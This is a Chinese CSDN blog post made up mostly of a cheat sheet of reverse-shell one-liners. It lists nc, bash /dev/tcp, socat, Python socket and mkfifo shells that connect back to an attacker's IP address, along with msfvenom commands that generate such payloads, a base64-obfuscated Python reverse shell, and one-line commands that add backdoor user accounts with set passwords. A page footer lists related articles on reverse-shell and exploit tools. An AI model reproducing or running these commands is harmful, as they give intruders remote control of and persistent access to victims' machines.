反弹shell

最新推荐文章于 2022-12-23 11:44:38 发布
最新推荐文章于 2022-12-23 11:44:38 发布
阅读量115 收藏
点赞数
分类专栏: shell 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54252904/article/details/115801086
版权
nc

受害主机

开启本地8080端口监听,并将本地的bash发布出去。

nc -lvvp 8080 -t -e /bin/bash

攻击主机

nc 172.21.230.72 8080 #连接受害主机的bash

bash 直接反弹

bash -i >& /dev/tcp/192.172.21.233/8080 0>&1

socat 反弹一句话

攻击主机开启12345端口监听

socat TCP-LISTEN:12345 -

靶机反弹shell到主机的12345端口

/tmp/socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:172.21.170.21:12345

python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“172.21.170.20”,8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

MSF

msfvenom -l payloads ‘cmd/unix/reverse’

使用 msfvenom -l 结合关键字过滤(如cmd/unix/reverse),找出我们需要的各类反弹一句话payload的路径信息。

mfs生成bash一句话

msfvenom -p cmd/unix/reverse_bash lhost=1.1.1.1 lport=12345 R

nc一句话反弹

msfvenom -p cmd/unix/reverse_netcat lhost=1.1.1.1 lport=12345 R

python一句话反弹

img

msfvenom -l payload | grep ‘reverse python’

msfvenom -p cmd/unix/reverse python lhost=172.21.170.21 lport=12345 R

靶机运行

python -c “exec(‘aW1wb3J0IHNvY2tldCAgICAgICAgLCBzdWJwcm9jZXNzICAgICAgICAsIG9zICAgICAgICA7ICBob3N0PSIxOTIuMTY4LjMxLjIwMCIgICAgICAgIDsgIHBvcnQ9MTIzNDUgICAgICAgIDsgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgICAgLCBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICBzLmNvbm5lY3QoKGhvc3QgICAgICAgICwgcG9ydCkpICAgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICwgMCkgICAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgLCAxKSAgICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAsIDIpICAgICAgICA7ICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=’.decode(‘base64’))”

其他

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.150 1234 >/tmp/f

一句话添加账号

  1. useradd newuser;echo “newuser:password”|chpasswd

  2. useradd -p openssl passwd 123456 guest

  3. useradd -p “$(openssl passwd 123456)” guest

  4. user_password="openssl passwd 123456" useradd -p “$user_password” guest

  5. useradd test;echo -e “123456n123456n” |passwd test

道长在此
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MFS-学习总结(部署)
csdnlb的博客
03-25 1220
实验环境 主机 IP 作用 安装软件 node1 192.168.27.11 Master Server moosefs-master\moosefs-cgi\moosefs-cgiserv\moosefs-cli node2 192.168.27.12 Chunk Servers moosefs-chunkserver node3 192.168.27.13 Chunk ...
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
SHELL脚本自动化部署MFS分布式文件系统
weixin_33946605的博客
12-04 261
前言:在我们运维中,最常见的文件存储系统大概就是NFS了,但是随着网站压力不断增加,NFS渐渐不能满足企业数据增长需求,有木有自动扩展、高效、部署、实施方便快捷的分布式存储供我们使用呢?那我们来看一下MFS基本可以满足我们的需求。 MogileFS是一种分布式文件存储系统。可支持文件自动备份的功能,提高可用性和高扩展性。MogileFS不支持对一个文件内部的随机或顺序读写,因此只适合做一部分应用...
MFS详解(三)——MFS应用
永远是少年
05-15 501
今天继续给大家介绍Linux运维相关知识,本文主要内容是应用。 一、MFS应用场景 二、MFS生产设备选型
记第一次学习mfs以及简单samba服务漏洞复现
qq_44060093的博客
07-14 542
kali攻击机:192.168.142.129 Metasploitable_ubuntu靶机:192.168.142.132 ip: 如果ifconfig无法显示ip地址,可以用>将ip显示追加到文件中,使用more命令查看一下 用户名\密码:root\ubuntu linux查看版本命令:lsb_release -a 如果ip不对,可以通过更改/etc/network/interfaces更改网卡信息 更改完之后重启网卡命令: /etc/init.d/networking restart (
MFS 服务扫描与爆破
weixin_30585437的博客
03-20 321
MSF 服务发现 常用来发现局域网内,的常见服务,比如HTTP,FTP,TELNET等. MSF模块搜索: [root@localhost ~]# msfconsole msf5 > search scanner type:auxiliary msf5 > search scanner/http type:auxiliary // 搜索所有与HTTP相关的模块 发现HTT...
反弹shell初识
无痕的博客
11-01 3937
反弹shell的指令与演示
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
详解NC反弹shell的几种方法
01-08
正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1...
反弹shell1
08-03
反弹Shell是一种黑客技术,常用于渗透测试和恶意攻击中,它允许攻击者远程控制目标系统。在这种场景下,攻击者通常在自己的机器上设置一个监听服务,然后在目标机器上执行特定的命令,使得目标机器的Shell(命令行...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和...反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
最新发布
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
Apache-flink 未授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 未授权访问任意jar包上传反弹shell
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like ...
内网渗透 - 代理篇(MFS代理)
weixin_41489908的博客
10-19 1177
男孩和青春只限于校园,踏出校园就要当成熟稳重的男人。。。 ---- 网易云热评 声明:贝塔安全实验室公众号文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系开白!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关! START 0x01前言 本次所使用的攻击机为kalilinux系统,攻击过程中涉及到的工具主要有:中国菜刀/中国蚂剑,burpsuite,metasploit,M...
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6632
生成木马进行植入
使用MSF反向反弹shell
weixin_45588247的博客
07-20 4520
实验准备: 攻击(攻击者)主机: kali 2020.2 虚拟机 nat 192.168.254.132 反向反弹: 【步骤一】:msfconsole启动,结果如【图1】所示: 【命令】 msfconsole 一、msfconsole(这种没有启用数据库,搜索某些东西会很慢) 二、数据...
metasploit基础学习 渗透(拿shell)和后渗透(留后门)
qq_38348692的博客
08-10 3481
使用metasploit时,要保持更新的好习惯,更新kali源 ,以及漏洞数据库,更新命令: (1)apt-get update:更新软件包的索引源,作用是同步源的软件包索引 (2)apt-get upgrade: 升级系统上安装的所有软件包 (3)apt-get dist-upgrade: 升级整个linux系统,包括内核升级 专业术语 (1)Auxiliaries:辅助模块,负责执行扫...
反弹shell无法反弹
08-13
关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值